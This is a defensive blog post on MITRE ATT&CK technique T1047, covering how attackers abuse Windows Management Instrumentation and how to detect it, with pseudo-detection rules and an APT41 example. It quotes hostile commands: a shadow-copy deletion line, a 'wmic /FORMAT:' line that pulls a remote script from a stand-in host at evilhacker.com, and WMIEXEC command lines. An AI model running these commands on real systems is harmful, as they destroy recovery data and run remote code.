Shahrukh.
← Back to blogs
By Shahrukh Khan··8 min read

T1047-Windows Management Instrumentation

MITRE ATT&CK Technique: T1047-Windows Management Instrumentation. Detections, visibility, use cases and real world attack insights.

Adversaries can abuse Windows Management Instrumentation (WMI) to run malicious commands on compromised systems. WMI, a core Windows feature for managing system components, allows both local and remote access via ports 135 (DCOM) and 5985/5986 (WinRM). Attackers use WMI to execute commands, deploy malicious code, or gather system data.

For example, they may use wmic.exe to delete shadow copies with the command wmic.exe Shadowcopy Delete. With wmic.exe being deprecated in 2024, PowerShell and other tools like COM APIs in C++ or VBScript will take over as the main WMI interfaces for attackers.

Malicious Objectives for Windows Management Instrumentation

Windows Management Instrumentation (WMI) is a native Windows feature commonly used on both local and remote systems. Administrators rely on WMI to:

  • configure system settings

  • execute processes or scripts

  • automate routine tasks

These capabilities, while beneficial for system management, also attract adversaries. Since WMI can operate across local and remote systems, attackers often exploit it for lateral movement. Additionally, because WMI is regularly used for legitimate purposes, malicious activity can easily blend in with normal system behavior, complicating detection efforts.

Mechanisms of Adversaries' Use of WMI

Adversaries frequently exploit Windows Management Instrumentation (WMI) to gain deeper access and control over compromised systems. One common method is the use of WMIC to enumerate and modify various components of a Windows environment. Attackers can determine which antivirus software is installed, disable firewall services, and even list group memberships, including local and domain administrator accounts. These capabilities allow them to prepare the environment for further malicious actions or evade security measures.

Beyond system enumeration, adversaries can manipulate system components like volume shadows, which are crucial for system recovery.

For example:

  • Delete volume shadows: Attackers can use WMIC to delete volume shadow copies, which are crucial for system recovery.

  • Bypass security alerts: These actions are often executed without triggering typical security alerts, making it harder for defenders to detect malicious activity.

  • Obfuscate ransomware activity: Deleting volume shadows helps attackers prevent defenders from noticing ransomware-related actions.

  • Prevent file recovery: By using commands like wmic shadowcopy delete, adversaries remove backup copies, making it difficult to recover encrypted files.

Moreover, adversaries have been known to exploit WMIC’s /format option in conjunction with XSL Script Processing to download and execute malicious scripts from remote locations. A command like

wmic os get /FORMAT:"http://evilhacker.com/attacker.xsl"

can effectively bypass security controls, allowing attackers to execute code hosted on external servers, further extending their control over the compromised environment.

Actions That Need to be Taken

Mitigating adversarial abuse of WMI is a complex challenge that requires careful consideration. While disabling the Winmgmt service might seem like an option, it’s generally not advisable. This is because many legitimate applications rely on WMI, and such a drastic action could disrupt critical system functionalities and lead to unforeseen issues.

To enhance security, administrators can restrict access to WMI namespaces, providing an additional layer of protection. However, since remote WMI access requires administrator privileges by default, it is already somewhat secured. Rather than trying to eliminate WMI abuse completely, security teams should focus on gathering relevant telemetry—such as that from AMSI—and developing reliable detection methods to identify WMI misuse effectively. This targeted approach allows organizations to address threats while maintaining the necessary operations of legitimate processes.

Visibility

Process Monitoring

Processes play a crucial role in our detection methods using WMI (Windows Management Instrumentation). In contrast to other techniques, malicious activities involving WMI typically show up as either wmic.exe or wmiprvse.exe. Most of the harmful actions that use WMI start from wmiprvse.exe. For example, if an attacker invokes the Create method from the Win32_Process class to move to another system, the new process will usually launch as a child of wmiprvse.exe on the targeted machine.

A potentially concerning child process of wmiprvse.exe is scrcons.exe. This executable is responsible for running scripts written in VBScript and JScript, especially when the ActiveScriptEventConsumer class is used for maintaining persistence. Although there are some legitimate reasons for scrcons.exe to run, it should be closely monitored for any suspicious behavior.

Command Monitoring

While some analytics focus mainly on the sequence of processes, many others combine process monitoring with command-line argument checks. The Get-WMIObject PowerShell cmdlet is especially valuable for tracking WMI activity.

Detection Technology

Windows Event ID 4688: Process Creation

Enhancing detection, enabling command-line logging in Windows Security Event ID 4688 provides a valuable telemetry source for identifying suspicious activity. This event log captures critical details about process start events, allowing for the analysis of WMI and other activities. By establishing a comprehensive understanding of normal and benign behaviors within your environment, it becomes easier to differentiate genuine threats from false positives.

Sysmon Event IDs 19, 20, and 21: WmiEvents

Enhancing detection, Sysmon provides specific WMI event codes (19, 20, and 21) that are instrumental in monitoring malicious WMI activities. When enabled, Sysmon logs persistent WMI subscriptions in the Microsoft-Windows-Sysmon/Operational event log, capturing event filter creation, event consumer creation, and filter-to-consumer binding with their corresponding Event IDs. While legitimate software may utilize these WMI features, such usage is rare and can be easily monitored to identify potential abuse.

Windows Event ID 5861: Microsoft-Windows-WMI-Activity/Operational

Event ID 5861 in the Microsoft-Windows-WMI-Activity/Operational event log consistently records permanent WMI event subscriptions. Such subscriptions serve as a primary method for adversaries to establish persistence via WMI. This persistence mechanism grants attackers significant control over the conditions under which their malicious payloads are executed.

Antimalware Scan Interface (AMSI) Telemetry

Endpoint security solutions that utilize AMSI event data can capture AMSI events associated with WMI tradecraft, including attempts at lateral movement and the establishment of permanent WMI event subscriptions. Additionally, AMSI is effective in identifying malicious usage of PowerShell's Get-WMIObject cmdlet.

Endpoint Detection and Response (EDR) Tools

An EDR tool serves as an invaluable asset for detecting adversaries exploiting Windows Management Instrumentation. This tool provides comprehensive visibility into a range of data sources, enhancing the ability of security teams to monitor and analyze endpoint activity effectively. The robust capabilities of EDR solutions equip organizations with the necessary insights to identify and respond to malicious behaviors efficiently.

Possible Use Cases

Suspicious Process Lineage

Trusted binaries and recognized administrative tools typically initiate WMI activity. Therefore, it is crucial to monitor for known malicious processes launching WMI or any deviations from expected behavior, such as a legitimate but atypical Windows binary initiating WMI or being spawned by it. The following is a compilation of various analytics designed to detect a broad spectrum of threats, including red team activities, web shells, and coinminers:

parent_process == wmiprvse.exe
&&
process == ('rundll32.exe' || 'msbuild.exe' || 'powershell.exe' || 'cmd.exe' || 'mshta.exe')

Suspicious Commands

Monitoring for suspicious command-line parameters serves as a reliable indicator of malicious activity. Various red team and post-exploitation frameworks can spawn unique and unsigned binaries or commands remotely using the well-known process call, create, and several detection methods have proven effective in alerting us to related activity over the years. Potentially suspicious WMI command switches include create, node:, process, and call. However, the maliciousness of these commands is context-dependent, which may necessitate tuning to minimize high volumes of false positives:

process == wmic.exe
&&
command_includes ('create' || 'node:' || 'process' || 'call')

Unusual Module Loads

Monitoring and detecting module loads can help identify various malicious activities, including defense evasion and credential theft. When adversaries utilize WMI for credential theft, it is advisable to investigate the execution of wmiprvse.exe (or its child processes) for unusual module loads, such as samlib.dll or vaultcli.dll. WMI also serves as an effective mechanism for bypassing application controls, and it is commonly observed that adversaries—both real and simulated—employ a WMI bypass technique referred to as “SquibblyTwo.” The following pseudo-detection analytic is specifically crafted to capture application control bypasses, but it can likely be adapted to identify other threats by substituting a different DLL or modifying the command:

process == wmic.exe
&&
command_includes ('format:')
&&
module_load == ('jscript.dll' || 'vbscript.dll')

Office Products Spawning WMI

The spawning of wmic.exe as a child process of Microsoft Office or similar products is nearly always indicative of malicious activity. Therefore, it is important to investigate the execution chain and subsequent activities in such cases. Below is a non-exhaustive example analytic designed to capture some of this activity:

parent_process == ('winword.exe' || 'excel.exe')
&&
process == wmic.exe

WMI Reconnaissance

Reconnaissance activities are more challenging to detect because they closely resemble typical administrative behavior. Nonetheless, we observe a significant volume of adversaries utilizing WMI to swiftly collect domain information, including details about users, groups, and computers within the domain. The following suggestions may assist in detecting related activities:

process == wmic.exe
&&
command_includes ('\ldap' || 'ntdomain')

Shadow Copy Deletion

Ransomware operators frequently utilize WMI to delete volume shadow copies, which greatly complicates the recovery of access to encrypted systems and files. To detect ransomware employing WMI for shadow copy deletion, consider monitoring for wmic.exe executions with command lines that include shadowcopy or delete.

process == wmic.exe
&&
command_includes ('shadowcopy' && 'delete')

Suspicious PowerShell Cmdlets

Numerous default PowerShell cmdlets enable administrators to leverage WMI through PowerShell. Both adversaries and administrators utilize these cmdlets to query the operating system or execute commands, whether locally or remotely. Cmdlets such as Get-WMIObject are commonly employed for reconnaissance activities.

process == powershell.exe
&&
command_includes ('invoke-wmimethod' || 'invoke-cimmethod' || 'get-wmiobject' || 'get-ciminstance' || 'wmiclass')

Real-life Example

Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.

APT41 evaluates an organization's network architecture to identify critical systems that facilitate further access. The group consistently pinpoints intermediary systems that grant entry to otherwise segmented areas of the network. Once these intermediary systems are identified, APT41 acts swiftly to compromise them.

APT41 employs multiple methods for lateral movement within an environment, including RDP sessions, leveraging stolen credentials, adding accounts to User and Admin groups, and utilizing password brute-forcing tools. The group may also use a compromised account to create scheduled tasks or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors. For example, APT41 can use a compromised account to create a scheduled task on a system, write a binary component of HIGHNOON containing the payload and command-and-control (C&C) information to disk, and modify the legitimate Windows WMI Performance Adapter (wmiApSrv) to execute the HIGHNOON payload.

APT41 frequently employs the publicly available utility WMIEXEC to facilitate lateral movement within an environment. WMIEXEC is a tool that enables the execution of WMI commands on remote machines.

cmd.exe /c whoami > C:\wmi.dll 2>&1
cmd.exe /c del C:\wmi.dll /F > nul 2>&1
cmd.exe /c a.bat > C:\wmi.dll 2>&1

Related posts

  • T1078.004-Cloud Accounts

    MITRE ATT&CK Technique: T1078.004-Cloud Accounts. Detections, visibility, use cases and real world attack insights.

  • T1027-Obfuscated Files or Information

    Trending MITRE ATT&CK Technique: T1027-Obfuscated Files or Information. Detections, visibility, use cases and real world attack insights.

  • T1114.003-Email Forwarding Rule

    MITRE ATT&CK Technique: T1114.003-Email Forwarding Rule. Detections, visibility, use cases and real world attack insights.

introducing shahrukhOS · crafted for a new perspective
Privacy
© 2026 · shipped through vibecoding